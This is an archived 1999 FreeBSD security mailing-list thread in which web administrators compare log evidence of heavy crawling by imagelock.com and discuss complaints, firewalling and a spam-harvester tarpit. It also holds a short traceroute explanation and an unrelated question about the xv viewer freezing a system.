hub.freebsd.org (Postfix) with ESMTP id 0B77514DE9 for ; Sun, 23 May 1999 14:24:05 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Received: from michael (lambda.ursine.com [209.133.45.69]) by quaggy.ursine.com (8.9.2/8.9.2) with ESMTP id OAA26165 for ; Sun, 23 May 1999 14:24:05 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Message-ID: <199905231424140440.0E81E3D5@quaggy.ursine.com> In-Reply-To: <4.2.0.37.19990523131810.04669d30@localhost> References: <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990523131810.04669d30@localhost> X-Mailer: Calypso Version 3.00.00.13 (2) Date: Sun, 23 May 1999 14:24:14 -0700 From: "Michael Bryan" To: freebsd-security@freebsd.org Subject: Re: Denial of service attack from "imagelock.com" Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 5/23/99 at 1:23 PM Brett Glass wrote: >I don't know whether or not this would help. But complaining to their >ISP probably would. Or to them directly. After I saw this thread, I went and checked our logs, finding similar full-scale scans of our web servers. I wrote a letter to 'info@imagelock.com', asking that they cease and desist of all scans of web servers in our network. Within an hour I had a response from 'belanger@imagelock.com'. He indicated that he had added our domain to the "do not scan" list they maintain. So he was at least responsive, and on a Sunday to boot. Of course, I then pointed out to him that what I wanted was for our entire network range to be fully bypassed by their scans, not just our main domain. We have several hosted domains, and I don't want to have to keep his list updated everytime we add/delete a domain. I haven't heard back yet, but I would hope that they are capable of blocking by IP address in addition to domain name. I think it would behoove anybody who's been hit by them to fire back with a request that they cease and desist. Then monitor to make sure they honor that. If they don't, complain to AboveNet, who will almost certainly let ImageLock know they have to clean up their act. At the very least, perhaps this will get them to clean up their software so that it does not hit anybody so intensely. Some things I noted about their scans in our log files: 1) They -are- requesting a robots.txt file before every scan wave. Whether or not they utilize this, I cannot tell, as we don't have a robots.txt file in use at this time. 2) Once they start a wave, it apparently gets farmed out to several different servers. It is possible for various files to be requested multiple times during a wave, from several different servers. 3) They don't always seem to respond to Redirects (HTTP code 301). We had a number of URLs that point to directories, but don't have the trailing "/", which results in the 301 error to the client when they come back for it. On some waves, these appear to have been added to the queue for grabbing later in the same day, but on other waves no subsequent lookups were done. 4) It looks like they're coming in for a new full scan once every one to three days, based on the entries in our logs. All that being said, I don't think this thread should continue on this mailing list, since it has nothing to do with FreeBSD. It has been valuable and informative, though --- perhaps this can be continued on a different (more appropriate) list if desired? Michael Bryan fbsd-security@ursine.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 14:30:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179]) by hub.freebsd.org (Postfix) with ESMTP id 0909014DE9 for ; Sun, 23 May 1999 14:30:47 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Received: from michael (lambda.ursine.com [209.133.45.69]) by quaggy.ursine.com (8.9.2/8.9.2) with ESMTP id OAA26228 for ; Sun, 23 May 1999 14:30:48 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Message-ID: <199905231430560660.0E88073E@quaggy.ursine.com> In-Reply-To: <199905231424140440.0E81E3D5@quaggy.ursine.com> References: <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990523131810.04669d30@localhost> <199905231424140440.0E81E3D5@quaggy.ursine.com> X-Mailer: Calypso Version 3.00.00.13 (2) Date: Sun, 23 May 1999 14:30:56 -0700 From: "Michael Bryan" To: freebsd-security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I previously wrote: > >I wrote >a letter to 'info@imagelock.com', asking that they cease and desist of >all scans of web servers in our network. Within an hour I had a >response from 'belanger@imagelock.com'. He indicated that he had >added our domain to the "do not scan" list they maintain. So he >was at least responsive, and on a Sunday to boot. > >Of course, I then pointed out to him that what I wanted was for our >entire network range to be fully bypassed by their scans, not just >our main domain. We have several hosted domains, and I don't want >to have to keep his list updated everytime we add/delete a domain. >I haven't heard back yet, but I would hope that they are capable of >blocking by IP address in addition to domain name. I got another response, again in fairly short order, indicating that this is exactly what they have done. He also gave me a phone number to call if I should ever notice their spider visiting our web sites again in the future. So they are responsive to requests to be put on their "don't scan me" list. That doesn't change the fact that their scanning methods are on the harsh side, but at least you can get them to stop scanning your network without adding another firewall rule. Michael Bryan fbsd-security@ursine.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 15:59: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from iglou.com (iglou1.iglou.com [192.107.41.3]) by hub.freebsd.org (Postfix) with ESMTP id 2F83315178 for ; Sun, 23 May 1999 15:58:55 -0700 (PDT) (envelope-from bertke@iglou.com) Received: from [204.255.239.37] (helo=gameho) by iglou.com with smtp (8.9.1/8.9.1) id 10lhCm-000607-00; Sun, 23 May 1999 18:58:52 -0400 Message-ID: <008c01bea56f$1da5a360$5f64a8c0@crackhouse.com> From: "Bert Kellerman" To: "Matthew Dillon" Cc: References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> Subject: Re: Denial of service attack from "imagelock.com" Date: Sun, 23 May 1999 18:53:45 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > If they are actually making TCP connections, then their IP address is > likely to be valid. This means you should be able to traceroute the > IP address to see what the last hop network is. You can then complain > to that network - I'd call up their NOC. > @FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 16: 5:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from iglou.com (iglou2.iglou.com [192.107.41.8]) by hub.freebsd.org (Postfix) with ESMTP id B699814DA9 for ; Sun, 23 May 1999 16:05:30 -0700 (PDT) (envelope-from bertke@iglou.com) Received: from [204.255.239.37] (helo=gameho) by iglou.com with smtp (8.9.1/8.9.1) id 10lhJ9-0005wG-00; Sun, 23 May 1999 19:05:27 -0400 Message-ID: <009401bea570$09546a80$5f64a8c0@crackhouse.com> From: "Bert Kellerman" To: "Matthew Dillon" Cc: References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> Subject: Re: Denial of service attack from "imagelock.com" Date: Sun, 23 May 1999 19:00:21 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You need UDP connectivity to perform a successful traceroute from a UNIX client..not TCP. The port number it uses is invalid ( like 33,000 i *believe* ) but of course it doesn't matter as all it does is increment the ttl and record the router that sends it back an ICMP 'TTL expired in transit'. Now M$ on the other hand decided to use ICMP echo requests for traceroute on their OSes and of course alot of nets block ICMP. So either way, my point is that an HTTP connection doesn't necessarily mean you can traceroute to it. I see now you might have been saying that because of an IP address existing you can traceroute, but just wanted to clarify :) Thanks Bert > If they are actually making TCP connections, then their IP address is > likely to be valid. This means you should be able to traceroute the > IP address to see what the last hop network is. You can then complain > to that network - I'd call up their NOC. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 16:37:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 6F63014DA9 for ; Sun, 23 May 1999 16:37:26 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA27940; Sun, 23 May 1999 17:37:17 -0600 (MDT) Message-Id: <4.2.0.37.19990523172757.04698960@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Sun, 23 May 1999 17:36:09 -0600 To: "Michael Bryan" , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: <199905231424140440.0E81E3D5@quaggy.ursine.com> References: <4.2.0.37.19990523131810.04669d30@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990523131810.04669d30@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:24 PM 5/23/99 -0700, Michael Bryan wrote: >Or to them directly. After I saw this thread, I went and checked our >logs, finding similar full-scale scans of our web servers. No surprise, really. If you use Altavista to search for their name, you'll find exposed Web server access logs which show that they do it to many, many servers throughout the Web. All without asking. > I wrote >a letter to 'info@imagelock.com', asking that they cease and desist of >all scans of web servers in our network. Within an hour I had a >response from 'belanger@imagelock.com'. He indicated that he had >added our domain to the "do not scan" list they maintain. So he >was at least responsive, and on a Sunday to boot. You probably received the same boilerplate letter I did. (Yes, it is a form letter.) Did it look something like this? >We have put your domain on our don't visit list. Please call me >directly at 415 392 3444, should our spider visit your site again. > >See WWW.IMAGELOCK.com for information on who we are. > >In general we have between 10 seconds and 3 minutes between request. > >If for some reason we had request grouped closer than 10 seconds, then >we must have hit some type of glitch. > >Our spider emulates a netscape browser 3.0. > >Again, please accept our applogies for any problems we may have caused. > >Ken I have so far received two messages from them with pieces of boilerplate text like the above arranged in different ways. >Of course, I then pointed out to him that what I wanted was for our >entire network range to be fully bypassed by their scans, not just >our main domain. So did I. Guess what? I received another boilerplate message similar to the first. >I think it would behoove anybody who's been hit by them to fire back >with a request that they cease and desist. Then monitor to make sure >they honor that. If they don't, complain to AboveNet, who will almost >certainly let ImageLock know they have to clean up their act. > >At the very least, perhaps this will get them to clean up their software >so that it does not hit anybody so intensely. > >Some things I noted about their scans in our log files: > >1) They -are- requesting a robots.txt file before every scan wave. >Whether or not they utilize this, I cannot tell, as we don't have >a robots.txt file in use at this time. True, but we don't want to shut out the LEGITIMATE robots. We want to block the attacks. >2) Once they start a wave, it apparently gets farmed out to several >different servers. It is possible for various files to be requested >multiple times during a wave, from several different servers. We saw this. Hundreds of requests in a few minutes. >3) They don't always seem to respond to Redirects (HTTP code 301). >We had a number of URLs that point to directories, but don't have >the trailing "/", which results in the 301 error to the client when >they come back for it. On some waves, these appear to have been >added to the queue for grabbing later in the same day, but on other >waves no subsequent lookups were done. We didn't see them responding to redirects at all. >4) It looks like they're coming in for a new full scan once every >one to three days, based on the entries in our logs. > > >All that being said, I don't think this thread should continue on this >mailing list, since it has nothing to do with FreeBSD. It has been >valuable and informative, though --- perhaps this can be continued on >a different (more appropriate) list if desired? I wasn't sure what list would be more appropriate! It *is* a security issue, because it is in effect a denial of service attack. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 16:37:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 6C8E514DE5 for ; Sun, 23 May 1999 16:37:30 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA27944; Sun, 23 May 1999 17:37:22 -0600 (MDT) Message-Id: <4.2.0.37.19990523173630.0469dd60@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Sun, 23 May 1999 17:37:14 -0600 To: "Michael Bryan" , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: <199905231430560660.0E88073E@quaggy.ursine.com> References: <199905231424140440.0E81E3D5@quaggy.ursine.com> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990523131810.04669d30@localhost> <199905231424140440.0E81E3D5@quaggy.ursine.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:30 PM 5/23/99 -0700, Michael Bryan wrote: >So they are responsive to requests to be put on their "don't scan me" >list. That doesn't change the fact that their scanning methods are >on the harsh side, but at least you can get them to stop scanning your >network without adding another firewall rule. You are assuming that they are as good as their word. I am not entirely sure that I trust them. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 18:11:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from Rigel.orionsys.com (rigel.orionsys.com [205.148.224.9]) by hub.freebsd.org (Postfix) with ESMTP id AB62414DA3 for ; Sun, 23 May 1999 18:11:37 -0700 (PDT) (envelope-from root@Rigel.orionsys.com) Received: from localhost (root@localhost) by Rigel.orionsys.com (8.8.8/8.8.8) with ESMTP id SAA15019; Sun, 23 May 1999 18:11:29 -0700 (PDT) (envelope-from root@Rigel.orionsys.com) Date: Sun, 23 May 1999 18:11:28 -0700 (PDT) From: David Babler To: Michael Bryan Cc: freebsd-security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: <199905231424140440.0E81E3D5@quaggy.ursine.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 23 May 1999, Michael Bryan wrote: > On 5/23/99 at 1:23 PM Brett Glass wrote: > >I don't know whether or not this would help. But complaining to their > >ISP probably would. > > Or to them directly... > > Some things I noted about their scans in our log files: > > 1) They -are- requesting a robots.txt file before every scan wave. > Whether or not they utilize this, I cannot tell, as we don't have > a robots.txt file in use at this time. They get it, and ignore it. They're just sucking up all files they see, since, as I said, I have webpoison installed. Webpoison is intended to befuddle brain-dead spam address harvesters by generating an infinite number of "interesting" pseudo-random web pages containing what look like more links (more webpoison pages) and email addresses (all bogus). The links on the page are invisible to humans and included in the robots.txt file, so legitimate robots never should go there. Our imagelock.com friends spent a LONG time there. -Dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 18:16: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (roble.com [199.108.85.50]) by hub.freebsd.org (Postfix) with ESMTP id 7CF6214E3F for ; Sun, 23 May 1999 18:15:58 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from roble2.roble.com (roble2.roble.com [199.108.85.52]) by roble.com (Roble1b) with SMTP id SAA11151; Sun, 23 May 1999 18:16:06 -0700 (PDT) Date: Sun, 23 May 1999 18:15:55 -0700 (PDT) From: Roger Marquis To: security@FreeBSD.ORG Cc: firewall-wizards@nfr.net, Firewalls@lists.gnac.net Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 22, 1999 at 06:40:20PM -0700, David Babler wrote: > > On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote: > > > This morning, someone at the domain "imagelock.com" apparently launched a > > > denial of service attack against a Web server I administer. The abuser was > > imagelock.com has been banned from my web servers ever since they > > initiated a DoS attack against me a few months ago. Basically, they > > download every accessible file on a website. The company's MO is to > > Their web client also gleefully ignores robots.txt as well, and spent 2 > hours here chasing web poisoned pages - apparently quitting only when it > didn't find any images to fingerprint. So they're now blocked here at the > firewall too - thanks for the heads-up. Wonder how much they can sell > their service for when they find they don't have access to poke around? Great information! Thanks Brett. I checked our httpd logs and immediately found several thousand hits from this subnet, which is now filtered. Imagelock could be another name for Cyveillance.com. We saw an identical pattern 2 months ago from another IP which had/has no reverse DNS. The domain turned out to be Cyveillance and their ISP was (at the time) Digex.net who forwarded our complaint and followed up twice. Thank you Digex! After 3 complaints to Digex and Cyveillance we finally received this response from Cyveillance: > Recently Digex, our internet provider, forwarded your inquiry regarding > visits to your site from 207.87.178.66. > > We provide companies with brand protection services on the internet. To > accomplish this goal we employ search engines / web crawlers to scan the > internet. We are in no way involved with the creation of unsolicited > commercial email. Please see our web site at http://www.cyveillance.com > where you can learn more about our company and what we do. > > It appears we crawled your web site as part of our general web search, and > crawled your mailto directories as part of that search. We hope we didn't > cause you any inconvenience. > > If you have any questions, don't hesitate to contact me. > > Paul K. Witting > Manager of Information Systems > Cyveillance - Intelligent Internet Surveillance > PWitting@Cyveillance.com > (703) 519-4212 However they never did stop scanning our subnets until we filtered their subnet at 207.87.178. This subnet still has no reverse DNS however `whois` shows Cyveillance is now a customer of imaphost.com and namesecure.com. "imaphost.com" is already in our IP filter list (all 27 lines of it) for previous HTTP abuses however namesecure.com is not. Call me paraniod but it sure looks like another Cyveillance attempt to cover their tracks. -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 18:24:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id C549E14E21 for ; Sun, 23 May 1999 18:24:18 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: from tdnet.com.br [200.236.148.211] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id ACADBF0154; Sun, 23 May 1999 22:34:37 -0300 Message-ID: <3740B863.6C20B59E@tdnet.com.br> Date: Mon, 17 May 1999 21:46:28 -0300 From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: user uses xv3.10a (PNG) to halt my system. Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear gentleman, probably, this is not the most suitable mailing list to post this mesg, but it's not worth to subscribe fbsd-questions only to get a answer. (if you hate me for that, ignore me) a) My system is 2.2.8Stable, where can i get a updated list about patch to this system? b) I have installed xv 3.10a (PNG), but my system has got freezed by running this software! So now, a user(i don't know which) have being stopping my system. c) is there possible to know which user is doing that? d) How can an user application halt my system, isn't fbsd supposed to be robust enough to handle this ? Thank you for your time and cooperation! best regards. Gustavo Rios To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 18:29:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id F315315021 for ; Sun, 23 May 1999 18:29:27 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id TAA28684; Sun, 23 May 1999 19:29:13 -0600 (MDT) Message-Id: <4.2.0.37.19990523191423.04639500@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Sun, 23 May 1999 19:17:31 -0600 To: David Babler , Michael Bryan From: Brett Glass Subject: Re: Denial of service attack from "imagelock.com" Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <199905231424140440.0E81E3D5@quaggy.ursine.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:11 PM 5/23/99 -0700, David Babler wrote: >hey get it, and ignore it. They're just sucking up all files they see, >since, as I said, I have webpoison installed. Webpoison is intended to >befuddle brain-dead spam address harvesters by generating an infinite >number of "interesting" pseudo-random web pages containing what look like >more links (more webpoison pages) and email addresses (all bogus). The >links on the page are invisible to humans and included in the robots.txt >file, so legitimate robots never should go there. Our imagelock.com >friends spent a LONG time there. Dave, could you write the people at noc@above.net and abuse@above.net and tell them that? Ignoring the robots.txt file amounts to unauthorized access -- big time. That's serious Web abuse. The Webmasters on this list may want to look over their logs to see if they've been hit and not known it. grep your logs for imagelock.com; if you find that they're abusing your server, you may want to firewall them out and complain to ABOVE.NET. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 18:57:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from ontario.mooseriver.com (ontario.mooseriver.com [208.138.31.116]) by hub.freebsd.org (Postfix) with ESMTP id 6CA4714DB3 for ; Sun, 23 May 1999 18:57:05 -0700 (PDT) (envelope-from jgrosch@ontario.mooseriver.com) Received: (from jgrosch@localhost) by ontario.mooseriver.com (8.9.3/8.9.1) id SAA57666; Sun, 23 May 1999 18:56:30 -0700 (PDT) (envelope-from jgrosch) Date: Sun, 23 May 1999 18:56:30 -0700 From: Josef Grosch To: David Babler Cc: Michael Bryan , freebsd-security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" Message-ID: <19990523185630.A57604@ontario.mooseriver.com> Reply-To: jgrosch@MooseRiver.com References: <199905231424140440.0E81E3D5@quaggy.ursine.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from David Babler on Sun, May 23, 1999 at 06:11:28PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 23, 1999 at 06:11:28PM -0700, David Babler wrote: > > > On Sun, 23 May 1999, Michael Bryan wrote: > > On 5/23/99 at 1:23 PM Brett Glass wrote: > > >I don't know whether or not this would help. But complaining to their > > >ISP probably would. > > > > Or to them directly... > > > > Some things I noted about their scans in our log files: > > > > 1) They -are- requesting a robots.txt file before every scan wave. > > Whether or not they utilize this, I cannot tell, as we don't have > > a robots.txt file in use at this time. > > They get it, and ignore it. They're just sucking up all files they see, > since, as I said, I have webpoison installed. Webpoison is intended to > befuddle brain-dead spam address harvesters by generating an infinite > number of "interesting" pseudo-random web pages containing what look like > more links (more webpoison pages) and email addresses (all bogus). The > links on the page are invisible to humans and included in the robots.txt > file, so legitimate robots never should go there. Our imagelock.com > friends spent a LONG time there. Where can one find webpoison? All the web servers I run, including my little test server on my home machine, have been scanned by imagelock.com. Josef -- Josef Grosch | Another day closer to a | FreeBSD 3.2 jgrosch@MooseRiver.com | Micro$oft free world | UNIX for the masses To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 19:11: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id B381514DB3 for ; Sun, 23 May 1999 19:10:50 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id EAA10531 for freebsd-security@FreeBSD.ORG; Mon, 24 May 1999 04:10:48 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id A33538836; Mon, 24 May 1999 01:16:06 +0200 (CEST) (envelope-from roberto) Date: Mon, 24 May 1999 01:16:06 +0200 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Subject: Re: Denial of service attack from "imagelock.com" Message-ID: <19990524011606.A45814@keltia.freenix.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990522105949.0465d4a0@localhost> <4.2.0.37.19990523131810.04669d30@localhost> <199905231424140440.0E81E3D5@quaggy.ursine.com> <199905231430560660.0E88073E@quaggy.ursine.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.5i In-Reply-To: <199905231430560660.0E88073E@quaggy.ursine.com>; from Michael Bryan on Sun, May 23, 1999 at 02:30:56PM -0700 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5322 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Michael Bryan: > list. That doesn't change the fact that their scanning methods are > on the harsh side, but at least you can get them to stop scanning your > network without adding another firewall rule. The main problem is the same as for spammers. It is an opt-out list, not an opt-in one. That makes them VERY bad in my list. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #71: Sun May 9 20:16:32 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 20: 9:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from panzer.plutotech.com (panzer.plutotech.com [206.168.67.125]) by hub.freebsd.org (Postfix) with ESMTP id E1BFE152C4 for ; Sun, 23 May 1999 20:09:17 -0700 (PDT) (envelope-from ken@panzer.plutotech.com) Received: (from ken@localhost) by panzer.plutotech.com (8.9.3/8.8.5) id VAA22141; Sun, 23 May 1999 21:08:52 -0600 (MDT) From: "Kenneth D. Merry" Message-Id: <199905240308.VAA22141@panzer.plutotech.com> Subject: Re: Denial of service attack from "imagelock.com" In-Reply-To: <19990523185630.A57604@ontario.mooseriver.com> from Josef Grosch at "May 23, 1999 06:56:30 pm" To: jgrosch@MooseRiver.com Date: Sun, 23 May 1999 21:08:52 -0600 (MDT) Cc: root@Rigel.orionsys.com (David Babler), fbsd-security@ursine.com (Michael Bryan), freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Josef Grosch wrote... > On Sun, May 23, 1999 at 06:11:28PM -0700, David Babler wrote: > > > > > > On Sun, 23 May 1999, Michael Bryan wrote: > > > On 5/23/99 at 1:23 PM Brett Glass wrote: > > > >I don't know whether or not this would help. But complaining to their > > > >ISP probably would. > > > > > > Or to them directly... > > > > > > Some things I noted about their scans in our log files: > > > > > > 1) They -are- requesting a robots.txt file before every scan wave. > > > Whether or not they utilize this, I cannot tell, as we don't have > > > a robots.txt file in use at this time. > > > > They get it, and ignore it. They're just sucking up all files they see, > > since, as I said, I have webpoison installed. Webpoison is intended to > > befuddle brain-dead spam address harvesters by generating an infinite > > number of "interesting" pseudo-random web pages containing what look like > > more links (more webpoison pages) and email addresses (all bogus). The > > links on the page are invisible to humans and included in the robots.txt > > file, so legitimate robots never should go there. Our imagelock.com > > friends spent a LONG time there. > > Where can one find webpoison? All the web servers I run, including my > little test server on my home machine, have been scanned by imagelock.com. I did a search on Yahoo and came up with what seems to be the home page: http://www.e-scrub.com/wpoison/ They've got some guidelines there for installing and using it. It looks quite interesting. I checked a web server I administer, and sure enough, it got hit by imagelock.com two days ago. I may just firewall them. :) Ken -- Kenneth Merry ken@plutotech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 23 20:45:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from mta2.snfc21.pbi.net (mta2.snfc21.pbi.net [206.13.28.123]) by hub.freebsd.org (Postfix) with ESMTP id DE40E14D74 for ; Sun, 23 May 1999 20:45:18 -0700 (PDT) (envelope-from out-door@pacbell.net) Received: from pacbell.net ([209.78.212.2]) by mta2.snfc21.pbi.net (8.8.8/8.7.1+antispam) with ESMTP id UAA03748; Sun, 23 May 1999 20:40:03 -0700 (PDT) Message-ID: <3748C9E0.FEF70C3@pacbell.net> Date: Sun, 23 May 1999 20:39:12 -0700 From: Alex X-Mailer: Mozilla 4.51 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Roger Marquis Cc: security@FreeBSD.ORG, firewall-wizards@nfr.net Subject: you should post this on ntsecurity@iss.net References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think you will find some friends there, the good kind. Alex Roger Marquis wrote: > On Sat, May 22, 1999 at 06:40:20PM -0700, David Babler wrote: > > > On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote: > > > > This morning, someone at the domain "imagelock.com" apparently launched a > > > > denial of service attack against a Web server I administer. The abuser was > > > imagelock.com has been banned from my web servers ever since they > > > initiated a DoS attack against me a few months ago. Basically, they > > > download every accessible file on a website. The company's MO is to > > > > Their web client also gleefully ignores robots.txt as well, and spent 2 > > hours here chasing web 